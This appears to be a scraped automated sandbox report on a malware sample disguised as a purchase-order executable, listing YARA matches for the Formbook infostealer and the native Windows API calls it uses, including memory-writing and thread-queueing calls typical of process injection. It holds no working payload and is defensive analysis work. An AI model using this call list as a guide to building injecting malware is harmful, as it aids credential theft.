Source: 0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 34.2.tzypqb0hdn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 34.2.tzypqb0hdn.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 34.2.tzypqb0hdn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 34.2.tzypqb0hdn.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_00416BC0 NtCreateFile,	1_2_00416BC0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_00416C70 NtReadFile,	1_2_00416C70
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_00416CF0 NtClose,	1_2_00416CF0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_00416DA0 NtAllocateVirtualMemory,	1_2_00416DA0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_00416BBA NtCreateFile,	1_2_00416BBA
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_00416C12 NtReadFile,	1_2_00416C12
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01559910
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015599A0 NtCreateSection,LdrInitializeThunk,	1_2_015599A0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559840 NtDelayExecution,LdrInitializeThunk,	1_2_01559840
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01559860
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_015598F0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559A50 NtCreateFile,LdrInitializeThunk,	1_2_01559A50
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01559A00
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559A20 NtResumeThread,LdrInitializeThunk,	1_2_01559A20
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559540 NtReadFile,LdrInitializeThunk,	1_2_01559540
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015595D0 NtClose,LdrInitializeThunk,	1_2_015595D0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01559710
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01559780
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_015597A0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01559660
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_015596E0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559950 NtQueueApcThread,	1_2_01559950
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015599D0 NtCreateProcessEx,	1_2_015599D0
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_0155B040 NtSuspendThread,	1_2_0155B040
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_01559820 NtEnumerateKey,	1_2_01559820
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 1_2_015598A0 NtWriteVirtualMemory,	1_2_015598A0
Source: C:\Users\user\Desktop\PO200

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO20012ZAS23JULY2020.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary: